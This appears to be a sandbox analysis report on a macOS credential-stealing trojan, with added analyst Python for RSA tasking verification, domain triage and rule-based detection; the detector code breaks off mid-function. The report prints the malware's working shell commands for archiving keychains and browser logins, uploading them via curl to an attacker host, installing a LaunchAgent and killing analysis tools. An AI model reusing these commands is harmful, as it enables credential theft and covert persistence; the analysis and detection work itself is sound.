
Analysis Report

Overview

General Information

Joe Sandbox Version: 19.0.0
Analysis ID: 37267
Start time: 16:25:03
Joe Sandbox Product: Cloud
Start date: 09.05.2017
Overall analysis duration: 0h 11m 19s
Report type: full
Sample file name: activity_agent.app.zip
Cookbook file name: default.jbs
Analysis system description: Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_25)
Detection: MAL
Classification: mal100.troj.adwa.spyw.expl.evad.macZIP@0/37@27/0


Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious


Classification

Signature Overview



Cryptography:

Executes the "openssl" command used for cryptographic operations
Source: /bin/sh (PID: 581) | Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 598) | Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Writes files containing public keys to disk
Source: /bin/sh (PID: 580) | File created 'PUBLIC KEY' pattern: /private/tmp/public.pem
Source: /bin/sh (PID: 595) | File created 'PUBLIC KEY' pattern: /private/tmp/au.pub
Source: /bin/cp (PID: 663) | File created 'PUBLIC KEY' pattern: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent
Source: /usr/libexec/DeveloperTools/codesign_allocate (PID: 677) | File created 'PUBLIC KEY' pattern: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp
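The two openssl invocations above are the sample's trust anchor for its tasking: it writes a hard-coded RSA public key to /tmp, fetches a blob into /tmp/au from https://handbrake.biz/rsa (see the curl entries further down), and runs `openssl rsautl -verify` on it. With PKCS#1 v1.5 padding that command does not compare a hash; it applies the public exponent and prints the plaintext that was embedded in the signature, so the one step both authenticates the blob and decodes it. An analyst who has /tmp/au can run the report's exact command with the key printed in this report to read what the C2 delivered, but cannot produce a blob the implant accepts without the private key. The following Python models that exchange end to end. It is an added example, not code from the sample, from OpenSSL or from Joe Sandbox; the key pair is generated inside the block, and PAYLOAD is a constructed stand-in, since the real contents of handbrake.biz/rsa are not in this report.

```python
"""Pure-Python model of `openssl rsautl -verify -pubin`: RSA signature with
message recovery under PKCS#1 v1.5 type-1 padding.  Added example; the key is
generated here and PAYLOAD is a constructed stand-in for the blob in /tmp/au."""
import random

E = 65537


def is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin; rng is a random.Random so the example is reproducible."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_keypair(prime_bits=512, seed=None):
    """Return (n, e, d).  Small prime_bits keep the demo fast; real keys use >= 1024.
    Needs Python 3.8+ for the modular inverse via pow(e, -1, phi)."""
    rng = random.Random(seed)
    while True:
        p = q = 0
        while not is_probable_prime(p, rng):
            p = rng.getrandbits(prime_bits) | (1 << (prime_bits - 1)) | 1
        while not is_probable_prime(q, rng) or q == p:
            q = rng.getrandbits(prime_bits) | (1 << (prime_bits - 1)) | 1
        phi = (p - 1) * (q - 1)
        if phi % E:                      # e is prime, so this means gcd(e, phi) == 1
            return p * q, E, pow(E, -1, phi)


def pkcs1_type1_pad(msg, k):
    """EM = 0x00 || 0x01 || 0xFF..0xFF || 0x00 || msg, exactly k bytes."""
    if len(msg) > k - 11:
        raise ValueError("message too long for this modulus")
    return b"\x00\x01" + b"\xff" * (k - len(msg) - 3) + b"\x00" + msg


def rsa_sign_recoverable(msg, d, n):
    """The operator's offline step: pad, then apply the private exponent."""
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(pkcs1_type1_pad(msg, k), "big"), d, n).to_bytes(k, "big")


def rsautl_verify(sig, e, n):
    """What `openssl rsautl -verify` does: apply the public exponent, check the
    type-1 padding and return the embedded message; any other shape is rejected."""
    k = (n.bit_length() + 7) // 8
    s = int.from_bytes(sig, "big")
    if len(sig) != k or s >= n:
        raise ValueError("signature length / range mismatch")
    em = pow(s, e, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        raise ValueError("bad padding header")
    sep = em.find(b"\x00", 2)
    if sep < 10 or any(b != 0xFF for b in em[2:sep]):   # at least 8 bytes of 0xFF
        raise ValueError("bad padding body")
    return em[sep + 1:]


# Constructed stand-in for the tasking served at handbrake.biz/rsa (not from the report).
PAYLOAD = b"constructed-tasking: version=1; action=noop"


def demo(seed=2017):
    """Returns (recovered plaintext, whether a blob signed under another key is refused)."""
    n, e, d = generate_keypair(prime_bits=512, seed=seed)    # operator's key pair
    blob = rsa_sign_recoverable(PAYLOAD, d, n)               # what the C2 serves as /tmp/au
    recovered = rsautl_verify(blob, e, n)                    # what the implant (or an analyst) sees
    n2, _, d2 = generate_keypair(prime_bits=512, seed=seed + 1)
    forged = rsa_sign_recoverable(PAYLOAD, d2, n2)           # same text, wrong private key
    try:
        rsautl_verify(forged, e, n)
        forgery_rejected = False
    except ValueError:
        forgery_rejected = True
    return recovered, forgery_rejected


if __name__ == "__main__":
    print(demo())
```

`rsautl` is deprecated in OpenSSL 3.x; `openssl pkeyutl -verifyrecover -pubin -inkey au.pub -in au` performs the same recovery. Note also that the padding check is the only integrity check the implant has, so it accepts any plaintext the key holder signs: the verification protects the operator against sinkholing and domain takeover, not the victim.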

Networking:

Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: script.google.com
Reads from file descriptors related to (network) sockets
Source: /usr/bin/curl (PID: 586) | Reads from socket in process:
Source: /usr/bin/curl (PID: 597) | Reads from socket in process:
Source: /usr/bin/curl (PID: 669) | Reads from socket in process:
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49295 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49294 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49296 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49297 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49297
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49296
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49295
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49294
Writes from file descriptors related to (network) sockets
Source: /usr/bin/curl (PID: 586) | Writes from socket in process:
Source: /usr/bin/curl (PID: 597) | Writes from socket in process:
Source: /usr/bin/curl (PID: 669) | Writes from socket in process:
Detected non-DNS traffic on DNS port
Source: global traffic | TCP traffic: 192.168.0.50:49293 -> 8.8.8.8:53
Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listens
Source: /bin/sh (PID: 583) | Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknown | DNS traffic detected: English language letter occurrence does not match the domain names
Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: script.google.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: script.googleusercontent.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: handbrake.biz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: handbrake.cc reply code: Server failure (2)
Source: unknown | DNS traffic detected: query: handbrake.cc reply code: Server failure (2)
Source: unknown | DNS traffic detected: query: handbrake.cc reply code: Server failure (2)
Source: unknown | DNS traffic detected: query: luwenxdsnhgfxckcjgxvtugj.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: 6gmvshjdfpfbeqktpsde5xav.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: kjfnbfhu7ndudgzhxpwnnqkc.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: yaxw8dsbttpwrwlq3h6uc9eq.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: qrtfvfysk4bdcwwwe9pxmqe9.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: fyamakgtrrjt9vrwhmc76v38.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: kcdjzquvhsua6hlfbmjzkzsb.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com reply code: Name error (3)
Source: unknown | DNS traffic detected: query: ypu4vwlenkpt29f95etrqllq.com reply code: Name error (3)
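script.google.com, a live Google host, gets the same Name error here as the throwaway names, so these reply codes describe the analysis network rather than the domains; the useful signal in this block is the lexical shape of the eight 24-character labels, which is what the "English language letter occurrence" signature scores. The following Python reproduces that kind of check over the names in this report. It is an added example, not Joe Sandbox's implementation; the features and thresholds are my own, and REPORT_DOMAINS is constructed from the queries and ping targets listed on this page.

```python
"""Lexical triage of the domain names a sample resolves, modelled on the
report's "letter occurrence does not match English" signature.  Added example;
the features and thresholds are my own choices, not Joe Sandbox's."""

VOWELS = frozenset("aeiou")

# Constructed from the DNS queries and ping targets listed in this report.
REPORT_DOMAINS = [
    "script.google.com", "script.googleusercontent.com",
    "handbrake.biz", "handbrake.cc", "handbrakestore.com",
    "luwenxdsnhgfxckcjgxvtugj.com", "6gmvshjdfpfbeqktpsde5xav.com",
    "kjfnbfhu7ndudgzhxpwnnqkc.com", "yaxw8dsbttpwrwlq3h6uc9eq.com",
    "qrtfvfysk4bdcwwwe9pxmqe9.com", "fyamakgtrrjt9vrwhmc76v38.com",
    "kcdjzquvhsua6hlfbmjzkzsb.com", "ypu4vwlenkpt29f95etrqllq.com",
]


def registrable_label(domain):
    """Label left of the TLD (handbrake.biz -> handbrake).  Naive on purpose:
    a real tool would consult the Public Suffix List for names like .co.uk."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def lexical_features(label):
    """Cheap word-likeness features: vowel share, longest consonant run,
    and digits wedged between letters (keyboard noise such as yaxw8dsb)."""
    letters = [c for c in label if c.isalpha()]
    vowels = sum(c in VOWELS for c in letters)
    run = longest = 0
    for c in label:                        # digits and vowels both end a consonant run
        if c.isalpha() and c not in VOWELS:
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    embedded_digits = sum(
        1 for i, c in enumerate(label)
        if c.isdigit() and 0 < i < len(label) - 1
        and label[i - 1].isalpha() and label[i + 1].isalpha()
    )
    return {
        "length": len(label),
        "vowel_ratio": vowels / len(letters) if letters else 0.0,
        "max_consonant_run": longest,
        "embedded_digits": embedded_digits,
    }


def is_suspicious(domain, min_len=12):
    """Flag long labels that read like noise rather than words."""
    f = lexical_features(registrable_label(domain))
    if f["length"] < min_len:              # short labels carry too little signal
        return False
    return (f["vowel_ratio"] < 0.30
            or f["max_consonant_run"] >= 5
            or f["embedded_digits"] >= 1)


def triage(domains):
    """Unique domains that trip the heuristic, in first-seen order."""
    seen, flagged = set(), []
    for d in domains:
        if d.lower() in seen:
            continue
        seen.add(d.lower())
        if is_suspicious(d):
            flagged.append(d)
    return flagged


if __name__ == "__main__":
    for d in REPORT_DOMAINS:
        print(f"{'SUSPICIOUS' if is_suspicious(d) else 'ok':10s} {d:32s} {lexical_features(registrable_label(d))}")
```

On these names the vowel-ratio test alone separates the two groups (handbrakestore, 14 letters, scores 0.36; every generated name scores below 0.16). The heuristic is for triage, not blocking: long legitimate labels with few vowels exist, and a deployment would consult the Public Suffix List and an allow-list of known hosts before alerting.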

System Summary:

Classification label
Source: classification engine | Classification label: mal100.troj.adwa.spyw.expl.evad.macZIP@0/37@27/0

Data Obfuscation:

Imports the IOKit library (often used to register services)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security
Source: initial sample | Static MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

Creates application bundles containing icon files
Source: /bin/cp (PID: 663) | Icon file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/h.icns
Executes the "sed" command used to modify input streams (usually from files or pipes)
Source: /bin/sh (PID: 635) | Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 641) | Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 647) | Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 653) | Sed executable: /usr/bin/sed -> sed s/^Path=//
Source: /bin/sh (PID: 673) | Sed executable: /usr/bin/sed -> sed -i -e s/P_MBN/fr.handbrake.activity_agent/g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Source: /bin/sh (PID: 674) | Sed executable: /usr/bin/sed -> sed -i -e s=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist
Reads data from the local random generator
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 581) | Random device file read: /dev/urandom
Source: /usr/bin/curl (PID: 586) | Random device file read: /dev/random
Source: /usr/bin/curl (PID: 586) | Random device file read: /dev/random
Source: /usr/bin/curl (PID: 597) | Random device file read: /dev/random
Source: /usr/bin/curl (PID: 597) | Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 598) | Random device file read: /dev/urandom
Source: /usr/bin/zip (PID: 627) | Random device file read: /dev/random
Source: /usr/bin/zip (PID: 655) | Random device file read: /dev/random
Source: /usr/bin/zip (PID: 658) | Random device file read: /dev/random
Source: /usr/bin/curl (PID: 669) | Random device file read: /dev/random
Source: /usr/bin/curl (PID: 669) | Random device file read: /dev/random
Uses AppleKeyboardLayouts bundle containing keyboard layouts
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to disk
Source: /bin/cp (PID: 663) | XML plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Source: /bin/cp (PID: 663) | Binary plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/MainMenu.nib
Changes permissions of written Mach-O files
Source: /bin/cp (PID: 663) | Permissions modified for written 64-bit Mach-O /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent: bits: - usr: rx grp: rx all: rwx
Source: /usr/bin/codesign (PID: 676) | Permissions modified for written 64-bit Mach-O /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent.cstemp: bits: - usr: rx grp: rx all: rwx
Creates application bundles
Source: /bin/cp (PID: 663) | Bundle Info.plist file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist
Creates hidden files, links and/or directories
Source: /bin/cp (PID: 663) | Hidden file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.hash
Source: /bin/cp (PID: 663) | Hidden file created: /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/.tmpdata
Source: /usr/bin/touch (PID: 670) | Hidden file created: /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /bin/sh (PID: 671) | Hidden file created: /Users/vreni/Library/VideoFrameworks/.crd
Executes commands using a shell command-line interpreter
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwUP19DdW2NlkkdovqqwF+r3sBaamka42zVMGa+COUCIysrVhVJIv4nmc57TLxgG8dsg+G0o0NQ75n898b04lYGve3gXGWJ8Y5OTJ16+RA4OtKAiO8v7qEGnQ/QpSzrLZPU3Yd60bAltYSvCCiOdBOKhOAiag0H39F2k5ea4zxt6TNDksW/o3+HcjzA4yy+C1tp2Cr4X37O5XMVZPWpMksIXPazh91tr0TJ2VFyx4btnDPajeOzhcKUA05Wrw+hagAZnFU9Bajx3KvdTlxsVxLmRc5r3IqDAsXTHH1jpmWMDiC9IGLDFPrN6NffAwjgSmsKhi1SC8yFHh0oPCswRhrQIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /Users/vreni/Desktop/unpack/activity_agent.app/Contents/Resources/.tmpdata -pubin -inkey /tmp/public.pem
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c if [ -f /Users/vreni/Library/VideoFrameworks/.ptrun ] then echo success fi
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c sudo -k
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c echo '' | sudo -S echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://handbrake.biz/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Rp260Eq/1ZrGGMoHdIWvnOMvVYguY+DxDyHsgFGbYJPQOOkuwRvdyYnqqDvMFguNtQFVi5K35U6kv89aE8i2u8tY0efGwbTXLUIOCc7kCKzm6PcxmsIoDgsdndOriAfwSaKgsOYphOTrBsxuYe4W1f6gNj9cK0eicoizADsnlKInu+Im7xir+hdH58Kncs1gGTeo+QWyl3xpytjGkO2oVcfGbM7Xrgvc/ux49quE6lLNer3OlfORrGsSRoXcaaq7z6bjYB8U5oWJraD5heqGHT/FCarn/+qbwurWcpTmHCNPjr1+0K33XGKn6zYOT0mQ3kt2VmUUnKQhwUMs31tUwIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 handbrake.biz 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 handbrakestore.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 handbrake.cc 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 luwenxdsnhgfxckcjgxvtugj.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 6gmvshjdfpfbeqktpsde5xav.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 kjfnbfhu7ndudgzhxpwnnqkc.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 yaxw8dsbttpwrwlq3h6uc9eq.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 qrtfvfysk4bdcwwwe9pxmqe9.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 fyamakgtrrjt9vrwhmc76v38.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 kcdjzquvhsua6hlfbmjzkzsb.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c ping -c 1 ypu4vwlenkpt29f95etrqllq.com 2>/dev/null >/dev/null && echo 0
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c mkdir -p /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks ~/Library/LaunchAgents/ chmod -R 777 /Users/vreni/Library/RenderFiles /Users/vreni/Library/VideoFrameworks zip -r /Users/vreni/Library/VideoFrameworks/KC.zip ~/Library/Keychains/ /Library/Keychains/ zip /Users/vreni/Library/VideoFrameworks/CR.zip ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Login\ Data ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Cookies ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Bookmarks ~/Library/Application\ Support/Google/Chrome/Profile\ 1/History ~/Library/Application\ Support/Google/Chrome/Profile\ 1/Web\ Data zip /Users/vreni/Library/VideoFrameworks/CR_def.zip ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data ~/Library/Application\ Support/Google/Chrome/Default/Cookies ~/Library/Application\ Support/Google/Chrome/Default/Bookmarks ~/Library/Application\ Support/Google/Chrome/Default/History ~/Library/Application\ Support/Google/Chrome/Default/W
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c cp -R /Users/vreni/Desktop/unpack/activity_agent.app /Users/vreni/Library/RenderFiles/activity_agent.app mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/Info_.plist /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Info.plist mv /Users/vreni/Library/RenderFiles/activity_agent.app/Contents/Resources/fr.handbrake.activity_agent.plist ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist echo success
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c a1494347197=`curl -s -F full_name='vreni' -F username='vreni' -F password='' -F root_password='failure' -F serial='C07N355HDWYL' -F hostname='vreni%E2%80%99s Mac mini' -F signed='0' -F file='@/Users/vreni/Library/VideoFrameworks/proton.zip' -F api_key=9fe4a0c3b63203f096ef65dc98754243979d6bd58fe835482b969aabaaec57ea -F cts=1494347197 -F signature=77aa1c7aafbc61542eb30c0f1a1cb7f29c68adcaf5dbaa73561688d648c4f7b6 https://handbrake.biz/api/init` echo $a1494347197
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c touch /Users/vreni/Library/VideoFrameworks/.ptrun
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c echo 'vreni::59786d197c6e371c157dffe729774a4009357f5771e09e116e7e47814412661a96d8eee899399a89a005ab084dd231d25d11bde5e94d557a4b4ba965c44a4e53' > /Users/vreni/Library/VideoFrameworks/.crd
Source: /Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent (PID: 579) | Shell command executed: /bin/sh -c sed -i -e 's/P_MBN/fr.handbrake.activity_agent/g' ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist sed -i -e 's=P_UPTH=/Users/vreni/Library/RenderFiles/activity_agent.app/Contents/MacOS/activity_agent=g' ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist chmod 644 ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app rm -rf /Users/vreni/Library/RenderFiles/activity_agent.app/Ic* launchctl load ~/Library/LaunchAgents/fr.handbrake.activity_agent.plist killall Console killall Wireshark rm -rf /Users/vreni/Desktop/unpack/activity_agent.app
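Read in order, the shell commands above are the whole life cycle of the implant: verify the bundled .tmpdata with the baked-in key, check that TCP/53 to 8.8.8.8 is reachable, poll a Google Apps Script URL, expire any cached sudo credentials with `sudo -k` and test an empty password with `echo '' | sudo -S`, fetch and verify signed tasking, zip the keychains, the Chrome, Firefox, Safari and Opera credential stores, ~/.gnupg and the 1Password folders into proton.zip, upload that archive with a multipart POST whose fields carry the user name, the captured password (empty here), the root-password outcome (`failure`, matching the failed sudo probe), the serial number and the host name, then copy the bundle to ~/Library/RenderFiles, strip its signature, install a LaunchAgent, kill Console and Wireshark and delete the original. The following Python turns that sequence into a small rule set and runs it over process events constructed from the entries above. It is an added example, not Joe Sandbox's signature engine; the rule weights, the verdict threshold and the benign control events are my own.

```python
"""Rule-based triage of process-execution events, built from the shell commands
this report lists for activity_agent.  Added example (not Joe Sandbox's engine);
the events are constructed from the report and the weights are my own."""
import re

# (rule name, pattern over the command line, weight).  Each rule keys on a
# combination that is rarely benign, not on the tool name alone.
RULES = [
    ("credential_archive",
     re.compile(r"^(?:zip|tar|ditto)\b.*?(?:Library/Keychains|Login Data|Cookies|"
                r"logins\.json|cookies\.sqlite|\.gnupg|1Password)"), 5),
    ("multipart_upload_with_secrets",
     re.compile(r"^curl\b(?=.*\s-F\s)(?=.*\bfile=@)"
                r"(?=.*\b(?:password|root_password|serial|hostname)=)"), 5),
    ("sudo_password_probe",     re.compile(r"^sudo\s+-S\b"), 2),
    ("signature_stripped",      re.compile(r"^codesign\s+--remove-signature\b"), 3),
    ("launch_agent_loaded",     re.compile(r"^launchctl\s+load\b.*Library/LaunchAgents/"), 2),
    ("analysis_tool_killed",    re.compile(r"^killall\s+(?:Console|Wireshark)\b"), 3),
    ("signed_payload_recovery", re.compile(r"^openssl\s+rsautl\s+-verify\b.*-pubin"), 1),
    ("dns_port_probe",          re.compile(r"^nc\b.*\s-z\s.*\s53$"), 1),
    ("sample_removed",          re.compile(r"^rm\s+-rf\s+\S+\.app$"), 1),
]
WEIGHTS = {name: w for name, _, w in RULES}

# Constructed (pid, argv) events, trimmed from the report's "Shell process" entries.
SAMPLE_EVENTS = [
    (581, "openssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub"),
    (583, "nc -G 20 -z 8.8.8.8 53"),
    (592, "sudo -S echo success"),
    (627, "zip -r /Users/vreni/Library/VideoFrameworks/KC.zip /Users/vreni/Library/Keychains/ /Library/Keychains/"),
    (654, "zip -r /Users/vreni/Library/VideoFrameworks/FF.zip /Users/vreni/Library/Application Support/Firefox//logins.json"),
    (660, "killall Wireshark"),
    (669, "curl -s -F username=vreni -F password= -F root_password=failure -F serial=C07N355HDWYL "
          "-F file=@/Users/vreni/Library/VideoFrameworks/proton.zip https://handbrake.biz/api/init"),
    (676, "codesign --remove-signature /Users/vreni/Library/RenderFiles/activity_agent.app"),
    (679, "launchctl load /Users/vreni/Library/LaunchAgents/fr.handbrake.activity_agent.plist"),
    (682, "rm -rf /Users/vreni/Desktop/unpack/activity_agent.app"),
]
# Constructed benign use of the same tools, to show the rules stay quiet on it.
BENIGN_EVENTS = [
    (700, "zip -r /tmp/photos.zip /Users/vreni/Pictures"),
    (701, "curl -s -o /tmp/version.txt https://updates.example/version.txt"),
    (702, "launchctl list"),
]


def match_command(cmd):
    """Names of every rule the command line trips."""
    return [name for name, rx, _ in RULES if rx.search(cmd)]


def analyze(events):
    """{pid: [rule, ...]} for every event that trips at least one rule."""
    hits = {}
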